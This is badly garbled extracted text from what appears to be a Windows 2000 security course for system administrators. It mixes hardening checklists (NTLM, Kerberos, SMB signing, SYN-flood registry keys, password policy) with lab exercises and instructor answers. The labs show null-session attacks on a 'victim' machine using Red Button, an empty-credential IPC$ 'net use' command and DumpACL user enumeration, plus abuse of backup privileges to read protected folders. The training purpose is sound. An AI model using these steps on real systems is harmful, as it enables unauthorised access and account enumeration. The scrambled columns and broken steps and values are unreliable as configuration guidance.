only LM authentication (Windows 95/98 and Widows for 

volzg
SAS2 Exercise A, step 17: The SEBACKUP and SERESTORE privileges allow a user who usually does not have access to a particular object read access to it.
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compatibility with 
down-level clients 
and servers, W2K 
supports NTLM.  
NTLM has four 
versions.  These 
versions are : LAN 
Manager (LM), 
Windows NT 
LanManager 
Version 1 (NTLM),  
Windows NT 
LanManager 
Version 2 
(NTLMv2), and 

e 

evel client.  

Workgroups) or only NTLM (Windows 4.0 prior to Service Pack 
4) 
 
Warning:  If adding a Windows 2000 machine to a Windows 
NT 4.0 domain, this value may need to be set to 4 on the 
Windows NT 4.0 domain controller. 
 
Note: To configure legacy systems see Countermeasure C below. 
 
COUNTERMEASURE B:

Secure Socket 
Layer/Transport 

 Security. The layer
LanManager 
authentication 
(LM) is the most 
insecure method, 
allowing encrypted 
passwords to be 
easily sniffed off 
the network and 
cracked.  NT 
LanManager 
(NTLM) is 
somewhat mor
secure.  By default, 
W2K will try 
NTLMV2, first 
when 
communicating to 
a down-l

 
� 1. Migrate to a total Windows 2000 network. 
 
COUNTERMEASURE C: 
� 1. To configure legacy system install AD Client Extension 
(MSClient) from the W2K installation CD.  See Q239869. 

IN 2000 should be configured to always send NTLM 
 

 
• W

V2 response_only\refuse LM+NTLM
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Kerberos

• What is Kerberos
• How does Kerb

– Client/application
– Network resource
– Key Distribution C

eros work 

enter (KDC)

3-1

 
Kerberos 

Vulnerability Countermeasure 
Kerberos is the core 
Windows 2000 security 
protocol typically used by 
IKE for IPSec 
authentication.  This traffic 
uses a UDP/TCP protocol 
source and destination po
88.  Kerberos is itself a 
security protocol that does 
not need to be secured by 
IPSec.  The Kerberos 
exemption is basically this:  
If a packet is TCP or UDP
and has a source o

rt 

 
r 

destination port = 88, 
permit. 
If a port scan using source 
port 88 is ran, it will get 
results no matter what W2K 
IPSec filters are in place. 

� 1. Use e
key value: 
 

g

t WORD 

No
y needs to be added. 

Distribution Center (KDC) server in a 

 
he server.  If 

 r gedt32 to create or assign the following registry 

Re istry Hive: HKEY_LOCAL_MACHINE 
SubKey: \System\CurrentControlSet\Services\IPSEC 
ValueName: NoDefaultExempt 

_DDa a Type: REG
Value Data: 1 

 
• Save and Reboot the system. 

te:  
• On a default system this ke
• Lock the Key 

secure room and do not attach a keyboard or display.  
Administer this server from a client workstation with 
appropriate administration software installed.  Audit
every access and attempted access to t
you KDC is not secure, nothing is. 
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Kerberos

3-1

Kerberos
client

Print
Server

W2K
DC/KDC

Authentication 
Service (AS)

Ticket
nting 

)
Gra

Service (TGS

1. Net rwo k access is requested

2. The KDC provides a (TGT)

3. Access t  o a resource is requested (TGT)

4. KDC issu  aes n (ST) based on user rights

5. (ST) is presented to the resource

User

 
 

3-1

Kerberos

3-1

Kerberos Configuration

• Credential Time
– Service Ticket (session ticket)
– User Ticket (TGT) = 10 hrs
– Maximum renewal time = 7 da

 

• Vulnerability within Kerberos
 = 10 hrs – IPSec

– Known port numbers
ys – System clocks need to be synchronized
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3-1

Network Access

 

• Who needs Access

• Access to the server

• Remote Access

• Revoking Access

 

Network Access 
Vulnerability Countermeasure 

Consider revoking 
network access to the 
server.  By doing this, 
you are requiring all 
server administration to 
be done from the server 
console. 

� 1. Click the Start button and choose Run. 
� 2. Type in MMC. 
� 3. Once the MMC console box comes up left-click on 

Console from the tool bar. 
 � 4. Choose Add/Remove Snap-in. 
 � 5. Left-click Add, choose Security Configuration and 

Analysis, left-click Add, Close, OK. 
 � 6. Right-click on Security Configuration and Analysis, 

choose Open Database. 
 � 7. Type in a new database name, and then click Open. 
 � 8. Select a Security Template to import, and then click 
Open. 
 � 9. Right-click the Security Configuration and Analysis 

scope item and choose Configure Computer Now. 
 
Note: After the configuration is complete, you must perform 
an analysis to view the information in your database. 
 
� 10.  Right-click the Security Configuration and Analysis 

scope item and choose Analyze Computer Now. 
� 11.  In the dialogue box, type the path of the log file, and 

click OK.  You may choose the default path if you do 
not have log files set up. 

� 12. Expand the Security Configuration and Analysis 
scope item. 

� 13. Expand the Local Policies. 
� 14. Double-click User Rights Assignment. 
� 15. Double-click Access this computer from the network. 
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� 16. Place a check mark in the box “define this policy in 
the database”. 

 � 17. Place a check in the box for the group/groups you wish to 
have network access to the computer. 

 18. Click O.K. 
� 19. Save the policy under the default directory and reboot 
the server. 

�

 

Kelly Larsen
SAS3 Exercise A, step 13:
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entation with process tokens. 
instructor the appropriate drive letter to use in place of W2KServer. 

XX account has the 

nter key or click the OK Button. 

e middle-left select pview.exe. 

cess button in the lower-left corner of the PVIEW window.  Which groups are enabled to use 

. Select Start->Programs->Accessories->Windows Explorer. 

e 

 

. Close the Error Dialog Box. 

0. Select Start->Run 

1. Enter the command PVIEW and Press enter key or click the OK Button. 

2. From the drop-down menu in the middle-left select explorer.exe. 

3. Click the Token Process button in the lower-left corner of the PIEW window. 

4. Enable the SEBACKUP and SERESTORE privileges for explorer.exe by selecting SEBACKUP and SERESTORE 
d pressing the  << button. 

ndow. 

le-click on the secret folder again. 

Practical Exercise SAS-2E 
EXERCISE D 

his practical exercise will provide hands-on experimT
Please retain from the 
 
1. Log on locally to the W2KServer, using the backupXXX account (pwd = student).  The backupX

EBACKUP and SERESTORE privileges. S
 
2. Select Start->Run. 
 

. Enter the command PVIEW and Press e3
 
4. From the drop-down menu in th
 
5. Click the Token Pro

view.exe? p
 

 
 

Note the disable privileges.  Why are some privileges disabled? 
 
 
  
 
6. Close PVIEW window by pressing the OK button to close the Security context and the Exit button to close the 
PVIEW Window. 
 
7
 
8. Attempt to open the secret folder on the W2KServer Partition (MyComputer\W2KServer).  Only administrators hav
full control on the secret folder.  No other group has been granted access.  What were your results? 

 

 
 
9
 
1
 
1
 
1
 
1
 
1
from the Disable Listing an
 
15. Click OK to close the Process Access Token wi
 
16. Using the Explorer window already open, doub
 
What are your results? 
 
 

Kelly Larsen
SAS3 Exercise A, step 23:
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RESTORE privileges? 
 
17. What Security issues are associated with the SEBACKUP and SE
 
 
 
18. Log out. 
 
19. Wait for instructor review. 
 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-91 

Server Message Block (SMB)

• What is SMB
• Anonymous connections
• Session hijacking
• Sniffing SMB Packets

 3-1

 
Server Message Block (SMB) 

Vulnerability Countermeasure 
SMB is implemented 
s the Server and 

Countermeasure A: 

 1. Enable SMB signing, also known as Common Internet 
File System (CIFS). Take the following steps to enable SMB 
signing utilizing Security Snap-ins within MMC. 

• Choose Add/Remove Snap-in. 
• Left-click Add, choose Security Templates, left-

click Add, Close, OK. 

• Left-click Security Options. 

tailor the SMB signing options to meet your 

Note: To use SMB digital signing, this option must be 

ays) 
 client to always digitally sign SMB 

communications.  Digital signatures provide mutual 

ctive message attacks. 

a  
Workstation service on �
W2K computers.  

e SMB are: 

. Using anonymous 

. Sniffing the data out 

However, SMB is 
generally considered a 
security problem if you 

 
• Click the Start button and choose Run. 

are connected to an 
untrusted network.  

• Type in MMC. 
• Once the MMC console box comes up left-click on 

Some of the potential 
risks associated with 

Console from the tool bar. 

th
 
1 • Expand the Security Templates scope item. 

• Expand Local Policies. connections to access 
SMB “shares” that do 
not have appropriate 
ACL’s. • At this point, you can enable four separate options to 
 

organizations security requirements. 
 

2. Having a session 
“hijacked” by someone 
who then masquerades 
s the real client. enabled on both the SMB client and server. a

 
• Digitally sign Client Communications (Alw

 
3

Forces an SMBof the SMB packets. 

authentication during SMB exchanges, preventing “man-
in-the-middle” and a

 

Kelly Larsen
SAS3 Exercise A, step 48:


Kelly Larsen
SAS3 Exercise A, step 51:
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en Possible) 

when communicating with an SMB server that also 
supports packet signing. 

Digitally Sign Server Communications (Alw

communications. 
 

• Digitally Sign Server Communications (When 

erver to perform digital packet signing 

• Digitally sign Client Communications (Wh
Enables an SMB client to perform digital packet signing 

 
• ays) 

Forces an SMB server to always digitally sign SMB 

Possible) 
Enables an SMB s
when communicating with an SMB client that also 
supports packet signing. 

 

3-1

NULL Session

• What is a Null Session
– A connection with a blank (null) username and 

password
– The anonymous user is placed in the Everyone 

Group

 
 
Null Access 

Vulnerability Countermeasure 
Null session (a.k.a. 
Anonymous access) is 
defined as a connection with 
a blank username and a 
blank password.  When 
someone makes an 
anonymous connection, the 
anonymous user is Granted 
privileges and permissions 
of the Everyone Group. 
Once this anonymous 
authentication is made, the 
user may issue MSRPC 
calls to obtain information 
or attempt to access any 
files that are shard by the 
Everyone group. 

Countermeasure A: 
� 1. Disable ports 139 and 445. 

• Go to Network and Dial-up Connections in 
Control Panel. 

• Highlight Local Area Connection. 
• From the toolbar, choose Advanced, Advanced 

Settings. 
• Remove the check from the File and Printer 

Sharing box. 
• Click O.K. 

 
Note: TCP 139 will still appear during a port scan even 
after this is set.  However, the port will no longer provide 
NetBIOS-related information. 

 

Kelly Larsen
SAS3 Exercise A, step 60:
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Countermeasure B: 
� 1. If you choose to leave NetBIOS/SMB enabled, you must 

set RestrictAnonymous.  Use regedt32 to create or 
assign the following registry key value: 

 
Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: \System\CurrentControlSet\Control\Lsa 
ValueName: RestrictAnonymous 
Data Type: REG_DWORD 
Value Data: 1 

     Note: The default value is 0 
 
Countermeasure C: 

� 1. Alternative method of 
setting  RestrictAnonymous is 
through the MMC. 

 the S oose Run. 

 left-click 

• From the Snap-in window choose Add. 

ain Controller Policy, 

ity 
curity Options. 

 

. 
 

 
• Click tart button and ch

C. • Type in MM
• Once the MMC console box comes up

on Console from the tool bar. 
• Choose Add/Remove Snap-in. 

• Choose Group Policy and choose Add. 
• Browse until you find the domain you wish to 

implement the policy on, choose OK. 
• Highlight Default Dom

choose OK. 
• Select Finish. 
• Select Close. 
• . Select OK. 
• Expand the policy to Windows Settings, Secur

Settings, Local Policies, Se
• Double-click Additional restrictions for 

anonymous connections. 
• Place a check in Define this policy setting box. 
• From the pull-down menu, choose Do not allow

enumeration of SAM accounts and shares. 
• Choose OK. 
• Save policy to default directory and reboot server

Note: 
The following method can be used to verify that anonymous 

. 

the “Command Prompt” window, enter the following 

log-ins are not allowed
 
� 1. In 
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command, and attempt to logon as the user 
“an

 

oft FTP Service 

38.ncr.disa.mil: (none)): anonymous 
nonymous access allowed, send identity (email 

23
ftp

 
• 

FTP login was permitted, you should immediately 
lank passwords are permitted. 

count is truly disabled, and that ftp 

onymous:” 

c:\>ftp 127.0.0.1 
Connected to ftru014538 Micros
(Version 2.0). 
User (ftru0145
331 A
name) as password. 
Password: password 

0 Anonymous user logged in. 
> 

If the command response indicates that an anonymous 

check to see that no b
That the guest ac
services are turned off unless needed. 
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W2K Network Security

Practical Exercise SAS-3A
Exercise A 
 
This practical exercise will provide h ed folders and anonymous logons. 
Please retain from the instructor the a er to use in place of W2K Server . 
 
1. Log on locally to the W2KServer, using the administrator account. 
 
2. Select Start->Programs-> Accessories ->W orer 
 
3. Drill down to the stage1 folder (MyCompu
 
4. Select Sharing. 
 
5. Click the Share This Folder button
 
6. Accept the default share name for 
 
7. Click the Permissions button. 
 
8. On the Permissions window, modi  Full Control & 
Change.  Press apply. 
 
9. Click OK to close the Permissions 
 
10. Click OK to close the stage1 Pro
 
11. Click Start->Run. 
 
12. Enter the UNC name of the share achine name\stage1. 
 
13. Attempt to create a folder in the stage1 sh
_____________________________________ _______________________________________________
_________________________________ 
 
 
14. Close the share window. 
 
15. Drill down through the file system  the stage2 folder. 
 
16. Right-Click the stage2 folder. 
 
17. Select the Sharing Tab.  Click the Share T utton. 
 
18. Click the Permissions button.  On lick add, if the Network Password Window appears, 
select cancel.  At the drop-down box
 
19. Add an ACE for Administrators: n the 
Permissions window, select Administ y 
selecting the Everyone group and pre
 

 

 

nds-on experimentation with shara
ppropriate drive lett

indows Expl

ter\W2Kserver\).  Right-click the folder, stage1. 

. 

stage1. 

fy the default permissions to Everyone: Read, by deselecting allow

window. 

perties window. 

 you created: \\your m

are.   What are your results? 
____________

 to

his Folder b

 the Permissions window, c
, select the current workstation name. (ex. WS217xxx) 

 Read & Change.  Select the Administrators group, click Add, click OK.  O
rators, select Change, press apply.  Delete the default ACE for Everyone b
ss the Remove button. 
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20. Click OK to close the Permission
 
21. Click OK to close the stage2 Pro
 
22. Click Start->Run 
 
23. Enter the UNC name of the share achine name.  Select the stage2 share. 
 
24. Attempt to create a folder, named 2 share.  What are your results? 
______________________________ __________________________________________________
______________________________ __ 
 
 
25. Right-Click the stage3 folder. 
 
26. Select Properties. 
 
27. Select the Security Tab button. 
 
28. Add an ACE for Anonymous Log n: Modi ons window, click Add, if the Network Password 
Window appears, select cancel.  At t x, select the current workstation name. 
 
29. Select the Anonymous Logon group.  Clic OK.  Select Modify.  Click OK to close the Permissions 
window. 
 
30.  Verify the permission setting on E's are defined? 
______________________________ ___________
______________________________
 
 
Investigating hidden shares 
Note: In this part of the exercise, you ine.  
The instructor will pair the students.  to 
Professional. 
 
On the system booted into Server 
31. Log on locally to the W2KServer ng the administrator account. 
 
32. Click Start->Run. 
 
33. Type mmc in the command window. 
 
34. From the Console drop-down menu, select
 
35. Click the Add button. 
 
36. Select the Shared Folders Snap In. 
 
37. Click the Add button. 
 
38. Click Finish to accept the default
 
39. Click Close to close the Snap In L
 
40. Click OK to close the Add/Remo
 
41. Double-click Shared Folders (Lo

s window. 

perties window. 

 you created: \\your m

 stage3, in the stage
________________
_

o fy.  On the Permissi
he drop-down bo

k Add.  Click 

 the stage3 folder.  What AC
_______________________________________________________
___ 

 will need to synchronize your activities with your partner on another mach
One system shall be booted into Server.  One system shall be booted in

, usi

 Add/Remove Snap In. 

 values. 

ist window. 

ve window. 

cal).   
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42. On the Tree pane, click Shares.  W
______________________________ ________________
______________________________
 
43. On the Tree pane, click Sessions. at information is displayed? 
_____________________________________ _______________
_________________________________ 
 
 
44. Click Start->Run 
 
45. Type cmd in the command window. 
 
46. In the command window, type ne list of the active sessions.  If any active sessions exist, type net ^ 
use ^*^ /delete.  Enter Y when promp
 
On the system booted into Professi al 
 
47. Log on locally to the W2Kprofes
 
48. Click Start->Run 
 
49. Type cmd in the command windo
 
50. Map to W2K Server by typing: n e is 
your partner’s computer and administ OT 
DELETE ANY FOLDERS OR FILE
 
51. Click Start->Run 
 
52. Type \\\\machine_name\admini en the share with Windows Explorer. 
 
On the system booted into Server 
 
53.  On the Tree pane, click Shares.  Wha
_________________________________ ______________________________________________________
_________________________________ 
 
54. On the Tree pane, click Sessions.  What in
_____________________________________ ____________________________________________
______________________________ __ 
 
On the system booted into Professi
55. In the command window type: ne to clear the drive mappings.  Enter Y when prompted. 
 
On the system booted into Server 
 
56.  On the Tree pane, click Shares.  ed? 
______________________________ ___________
______________________________
 
57. On the Tree pane, click Sessions.
______________________________ __________________________________________________
______________________________ __ 
 
 

hat information is displayed? 
__________________________________________________

___ 

  Wh
____________________________________________

t use to view a 
ted. 

on

sional, using the adminstrator account. 

w. 

et^ use^ z: ^ \\machine_name\administrative share (where machine_nam
rative share is the administrative share provided by the instructor).  DO N
S FOUND ON THE MAPPED DRIVE !!!! 

strative share or op

t information is displayed? 
_________

formation is displayed? 
_______________

_

onal 
t ^ use ^* ^ /delete 

What information is display
_______________________________________________________
___ 

  What information is displayed? 
________________
_
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Anonymous logon exploits 
Note: To demonstrate the capabilities of resou e a unique local 
user account.  This account will be “unauthen
enterprise. 
 
Execute this following on the W2K Profession
 
On the system booted into Professi al 
 
58. Right-click on My Computer. 
 
59. Select Manage. 
 
60. Open the Local User and Groups
 
61. Open the user folder, right-click i
 
62. Name the user LocalX, where X  and clear the 
User must change password at next l
 
63. Close the Computer Management

4. Log out of the administrator account. 
 
65. Log in using the LocalX account . 
 
66. Click Start->Run 
 
67. Attempt to browse your neighbor’s computer by typing \\machine_name, where machine_name is the name of 
your neighbor’s machine,  in the command window. 
Why does the Connect As window appear?  Note: If the Connect As window does not appear, this may be an indication 
that the LocalX account created is being authenticated by the network and not a local account to the system. 
________________________________________________________________________________________________
_________________________________ 
 
 
68. Cancel the Connect As window. 
 
69. Select Start->Programs->Administrative Assistant->Red Button.  The Red Button program establishes a null-user 
session to exploit the anonymous logon. 
 
70. On the Red Button Window, select the Select Server button.  Provide the IP address of the victim computer and 
click OK and clicking the big GO button. 
What information does Red Button reveal? 
________________________________________________________________________________________________
_________________________________ 
 
71. Close Red Button by pressing OK  to close the Access Granted Window and Close to close Red Button. 
 
72. Select Start->Programs-> Accessories ->Windows Explorer 
 
73. Open the root of the W2KPro (MyComputer\W2KPro). 
 
74. Select Start->Programs->System Tools->DumpSec.  Explorer  (Have the students do a search on Dumpsec). 
 
75. On the DumpACL Window, select Report->Select Computer. 
 

rce enumera
ticated” at the other member servers and domain controllers in our 

tion using anonymous logon, we must creat

al (non-firewall machine) 

on

 folder. 

n the right pane and select New User 

is the last octet of your computer’s IP.  Leave the password blank
ogon checkbox.  Click the create button.  Close the new user box. 

Console.  
 
6
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6. Type the name or IP address of the intended victim.  What error message did you receive? 
_ ______________________________________________________________________________________________
_________________________________ 
 
 
DumpACL does not automatically establish a null-user session as Red Button did. 
 
77. In a command window type net ^ use ^ \\intended_victim_IP\ipc$ ^ /user:””^ ”” . (The quotes are 2 sets of double 
quotes). 
 
78. Repeat steps 75 - 76. 
 
79. On the DumpACL Window, select the Report drop-down menu, select the DumpUsers as Table option.  Add fields 
from the available fields to the Selected fields.  Press  OK.   
How can the information displayed be utilized by an intruder ? 
________________________________________________________________________________________________
_________________________________ 
 
80. Close DumpACL 
 

1. Logout. 

 

7
_

8
 
82. W w. ait for instructor revie



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-100 

 

3-1

Denial of Service

• What is Denial of Service
• Vulnerabilities in Windows 2
• Exploits to TCP/IP Stack with

- IP Fragment Flooding
- SYN Flooding

• Countermeasures

 
 Denial of Service Against TCP/IP 

000
in Windows 2000

 

Stack 
Vulnerability Countermeasure 

D
remov
r
network.  Networking 
p
TCP/IP were designed 
t
a
and current version-4 
i
protocol have inherent 
flaws.  In addition, 
many operating systems 
and network devices 
have flaws in their 
network stacks that 
weaken their ability to 
withstand DoS attacks.  
These may include 
bandwidth 
consumption, resource 
starvation, or routing 
and DNS attacks.   
 
Note:

oS attacks attempt to 
e a system or 

esources from the 

rotocols such as 

o be used in an open 
nd trusted community, 

ncarnations of the 

 
DoS attacks against NT 
were patched in service 
pack 6a, W2K is 
comparatively quite 

:Countermeasure A  
Security Considerati ttacks  

website to these and other network attacks:  

� 1. s. Many third 
ect these types of 

� 2. onverting layer 3 broadcasts 
 The Cisco command to disable 

is is: no ip directed-broadcast. This is the default 
ater.  

� 3. Restrict routers to allow only the use of ports that are 
nec

l services (i.e.: Client for 

� 5. Enable TCP/IP filtering and restrict access to only the 
ports that are necessary for the server to function. (see 

s services use)  
� 6. Unbind NetBIOS over TCP/IP where it is not needed.  
� 7. 

� 8. for maximum protection  

ou e
Use
valu

ons for Network A
Take the following steps to lower the vulnerability of a 

 
 Monitor networks boundaries for attack
party companies offer tools that can det
attacks. (an intrusion detection tool that Is widely used 
can be found at:www.iss.net) 
 Ensure that routers are not c
into layer 2 broadcasts.
th
setting for routers that use IOS version 12.0 or gre

essary for the site to function.  
� 4. Disable unnecessary or optiona

Microsoft Networks on a IIS server)  

Q150543 for a list of ports that Window

Con ses and parameters for public 
adapters.  

figure static IP addres

 Configure registry sett
 

ings 

C nt rmeasure B: 
 regedt32 to create or assign the following registry key 
e: 



PRACTICAL EXERCISES 
C2 PROTECT/SYSTEM ADMINISTRATOR AND NETWORK MANAGER SECURITY 

 

1-101 

robust in this regard.  
However, nothing is 
invulnerable to DoS, 
therefore, certain steps 
should be taken to 
harden the system.  

 
\System\CurrentControlSet\ServicesTcpip\Parameters 

     W

on retries and delayed RCE 

ied 

2 – in addition to 1 a delayed indication to Winsock is 
made. 

Recom : 2 
escription: Synattack protection involves reducing the 

amo S, which will 
redu remain allocated. 
The s is delayed until 
a co  2, then the 
connection indication to AFD is
hand en by the protection 

echanism

 

ystem this key needs to be added.  
• The  Registry changes for configuring Windows 2000 

and IIS are  described in the IIS security checklist

 
Registry Hive: HKEY_LOCAL_MACHINE 
SubKey:

ValueName: SynAttackProtect 
Data Type: REG_DWORD 
Value Data: x 

here x: 
on 0 – no synattack protecti

i1 – reduced retransmiss
(route cache entry) creation if the 
TcpMaxHalfOpen and TcpMaxHalfOpenRetr
settings are satisfied 

Default: 0 (False) 
mendation

D
unt of retransmissions for the SYN-ACK
ce the time for which resources have to 
 allocation of route cache entry resource
nnection is made. If synattackprotect =

 delayed until the three-way 
shake is completed. The actions tak

 only occur if TcpMaxHalfOpen and m
TcpMaxHalfOpenRetried settings are exceeded. 

Note:  
• On a default s

  
• Consult Microsoft security web site regularly for 

security bulletins  
 
Registry Key:  
 

rs 

 
Where 

rver 

Recom

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\System\CurrentControlSet\ServicesTcpip\Paramete
ValueName: TcpMaxHalfOpen 
Data Type: REG_DWORD 
Value Data: x 

x is  
100 – Professional Se
500 – Advanced Server 
mendation: default 
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Note: O
Descri r controls the number of 
onnections in the SYN-RCVD state allowed before SYN-

t is 
an the AFD listen 

backlog on the port you want to protect (see Backlog 
Parameters for more information). See the SynAttackProtect 

Reg r
 

ip\Parameters 
alfOpenRetried 

ORD 
Value Data: x 

 
Where x is 

80 – Professional Server 
400 – Advanced Server 

Recommendation: default 
Note: On a default system this key needs to be added. 
Description: This parameter controls the number of 
connections in the SYN-RCVD state for which there has been 
at least one retransmission of the SYN sent, before SYN-
ATTACK attack protection begins to operate. See the 
SynAttackProtect parameter for more details.  
 
Registry Key:  
 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\System\CurrentControlSet\ServicesTcpip\Parameters 
ValueName: E very 

Note: On a default system this key needs to be added. 
Description: When this parameter is set to 1 (True) TCP 
attempts to discover the Maximum Transmission Unit (MTU 
or largest packet size) over the path to a remote host. By 
discovering the Path MTU and limiting TCP segments to this 

n a default system this key needs to be added. 
ption: This paramete

c
ATTACK protection begins to operate. If SynAttackProtec
set t  1o , ensure that this value is lower th

parameter for more details.  
 

ist y Key:  

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\System\CurrentControlSet\ServicesTcp
ValueName: TcpMaxH
Data Type: REG_DW

nablePMTUDisco
Data Type: REG_DWORD 
Value Data: x 

 
Where x is 

0 – False 
1 - True 

Default: 1 (True) 
Recommendation: 0 
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size, TCP can eliminate fragmentation at routers along the 
path that connect networks with different MTUs. 
Fragmentation adversely affects TCP throughput and network 
congestion. Setting this parameter to 0 causes an MTU of 576 
bytes to be used for all connections that are not to hosts on 
the local subnet. 
 
Registry Key:  
 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 

met
ers 
ValueName: NoNameReleaseOnDemand 
Data Type: REG_DWORD 
Value Data: X 

 
Where x is 

0 – False 
1 - True 

Default: 0 (False) 
Recommendation: 1 

S name when it receives a 
ame-release request from the network. It was added to allow 
e administrator to protect the machine against malicious 

ame-release attacks.  

egistry Key:  

RD 

1 - True 
Default: 1 (True) 
Recommendation: 0 
Description: When this parameter is 1, TCP is allowed to 

 dead-gateway detection. With this feature enabled, 
TCP may ask IP to cha ateway if a number 

\SYSTEM\CurrentControlSet\Services\NetBt\Para

Note: On a default system this key needs to be added. 
Description: This parameter determines whether the 
computer releases its NetBIO
n
th
n
 
R
 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\SYSTEM\CurrentControlSet\Services\Tcpip\paramet
ers 
ValueName: EnableDeadGWDetect 
Data Type: REG_DWO
Value Data: x 

 
Where x is 
0 – False 

perform
nge to a backup g

of connections are experiencing difficulty. Backup gateways 
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may
configuration dialog in the Network Control Panel. 
 
Reg r
 

eters 

 
Where x

nds – 1 – 0xFFFFFFFF 
 
Def t
Reco m
Not ded. 
Des p  TCP attempts 
to ve y  
keep-ali tem is still reachable and 
func n
Keep-alive packets are not sent by default. This feature may 
be enabled on a connection by an application.  
 
Registry Key:  
 

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 

\System\CurrentControlSet\ServicesTcpip\Parameters\Int
erfaces 

ValueName: PerformRouterDiscovery 
Data Type: REG_DWORD 
Value Data: x 

 
Where x is: 
     0 - disabled 
     1- enabled 
     2 - enable only if DHCP sends the router discover option 
Default: 2, DHCP-controlled but off by default. 
Recommendation: 0 
Note: On a default system this key needs to be added. 
Description: This parameter controls whether Windows 2000 
attempts to perform router discovery per RFC 1256 on a per-
interface basis.  
 
Registry Key:  
 

 be defined in the Advanced section of the TCP/IP 

ist y Key:  

Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\System\CurrentControlSet\ServicesTcpip\Param
ValueName: KeepAliveTime 
Data Type: REG_DWORD 
Value Data: x 

 is: 
ecoTime in millis

aul : 7,200,000 (two hours) 
endation: 300,000 m

e: On a default system this key needs to be ad
cri tion: The parameter controls how often
rif  that an idle connection is still intact by sending a

ve packet. If the remote sys
tio ing, it acknowledges the keep-alive transmission. 
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Registry Hive: HKEY_LOCAL_MACHINE 
SubKey: 
\System\CurrentControlSet\ServicesTcpip\Parameters 
ValueName: EnableICMPRedirect 

1 - True 

Note: On a default system this key needs to be added. 
Description: This parameter controls whether Windows 2000 

e in response to ICMP redirect 
etwork devices such as a 

 

Data Type: REG_DWORD 
Value Data: x 

 
Where x is: 

0 – False 

Default: 1 (True) 
Recommendation: 0 (False) 

will alter its route tabl
messages that are sent to it by n
routers.  

 

Kelly Larsen
SAS4  Exercise A step 9 answer:       YES
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3-1

Strong Password Policies

• In accordance with AR 25-2 passwords will mat
the following criteria.
– Min (10) characters long
– Contain two (2) characters from all of the following 

four (4) classes:
• .English upper case letters  A, B, C, ... Z
• .English lower case letters   a, b, c, ... z
• .Westernized Arabic   numerals     0, 1, 2, ... 9  
• .Non-alphanumeric ("special characters") such 

ch 

as punctuation 
symbols 

ction 

System Administrator/Net
Security Course

W2K Checklist 

work Manager 

Account Security

 

– May not contain references stated in AR 25-2 Se
IV, para 4-12e4.

 
 
Password Policies & Configuration 

Vulnerability Countermeasure 
IAW MSG DTG 
042100Z Mar 99 Fm 
ACERT Ft Belvoir 
VA.   

. Army policy 
ictates that passwords 

s 
e changed every six 

onflicting 

 

� 1. Verify that Windows 2000 is 
implementing strong password 
filtering. Passfilt.dll 
implements the following 
password policy:  

•  Passwords must be at min ten (10) characters long.  
• Passwords must contain characters from all of the 

 any part of 
your full name. 

• Type “mmc.exe” in the Run dialog. 
• Select “Console” from the MMC menu bar. 

e “Add” button on the Standalone tab. 

Object line and click the “Finish” button. 

G
d
in unclassified system
b
months; however, 

following four (4) classes:  

increased security is 
achieved by changing 
the password even 
more frequently 
 

a. English upper case letters A, B, C, ... Z 
b. English lower case letters   a, b, c, ... z 
c. Westernized Arabic   numerals     0, 1, 2, ... 9   
d. Non-alphanumeric ("special characters") such as 

punctuation symbols  
Passwords may not contain your user name or

Reference:  AR 25-2 
 
Note: 
Microsoft has 
documented c

� 2. Use MMC to configure password attributes 
 
• Select “Start” and “Run” from the desktop. 

information; reference 
the maximum 
password length for 
Windows 2000 (127 v 
128 characters).  This 

• Select “Add/Remove snap-in” from the drop-down 
menu. 

• Click th
discrepancy is being 
further researched. 
  

• Select the “Group Policy” snap-in and click the 
“Add” button. 

• Insure that “Local Policy” is in the Group Policy 

Kelly Larsen
SAS4Exercise A step 3 answers:  The policy column indicates the policy for the analysis results; the Database Setting column indicates the security value in your template; the Computer Setting column indicates the current security level in the system. 


Kelly Larsen
SAS4Exercise A step 4 answers:  A red X indicates a difference from the database configuration;  A green check mark indicates consistency with the database configuration; No icon indicates that the security policy was not included in your template and therefore not analyzed.
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tree window. (Professional & Server) 

ty Settings" object. 
 object and select 

icy". 
 Maximum Password Age - should be set to 150 days! 
 Minimum Password Age - should be set to 90 day! 

rd Length - should be set to 10 
characters! 

meet complexity requirements" - should be set to 

• Click “Close”. 
• Click “OK”. 
• Expand the "Computer Configuration" object in the 

• Expand the "Windows Settings" object. 
• Expand the "Securi

Expand the "Account Policies"• 
"Password Pol

•
•
• Minimum Passwo

• Password Uniqueness - "Enforce password history" – 
should be set to 10 passwords remembered! 

• Enable Strong Password Filtering - "Passwords must 

enable 
 
Default Pas word Protected Screen Saver s

Vulne bra ility Countermeasure 
If a workst o
unattended d
screen saver is

assword protected, 
nauthorized personnel 
ould access the 
orkstation and the 

ssociated network. 

 the following registry 

 
Registry Hive: HKEY_USERS 
SubKey: \.DEFAULT\Control 

Panel\Desktop 
Value Name: ScreenSaveActive 
Date Type: REG_SZ 
Value Data “1” 
 
• The above registry entry is the default setting 
• This setting will ensure by default that the user 

accounts screen savers are activated. 
 
� 2. Use regedt32 to create or assign the following registry 

key value: 
 

Registry Hive: HKEY_USERS 
SubKey: \.DEFAULT\Control 

Panel\Desktop 
Value Name: ScreenSaveIsSecure 
Date Type: REG_SZ 
Value Data “1” 

 
• The default setting is 0 
• This setting will ensure that the screen saver is 

password protected. 

ati n is left � 1. Use regedt32 to create or assign
 an  the 

 not 
key value: 

p
u
c
w
a
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 3.  Use regedt32 to create or assign the following registry 

key value: 
 

TimeOut 

Value Data “900” 

 setting. 

engage in 15 minutes or less. 

Value Name: SCRNSAVE.EXE 

�

Registry Hive: HKEY_USERS 
SubKey: \.DEFAULT\Control 

Panel\Desktop 
Value Name: ScreenSaveIs
Date Type: REG_SZ 

 
• The above registry setting is the default
• This setting will ensure that the screen saver will 

 
� 4.  Use regedt32 to create or assign the following registry 

key value:  
 

Registry Hive: HKEY_USERS 
SubKey: \.DEFAULT\Control 

Panel\Desktop 

Date Type: REG_SZ 
Value Data “logon.scr” 

 
• The above setting is the default setting.  After the value 

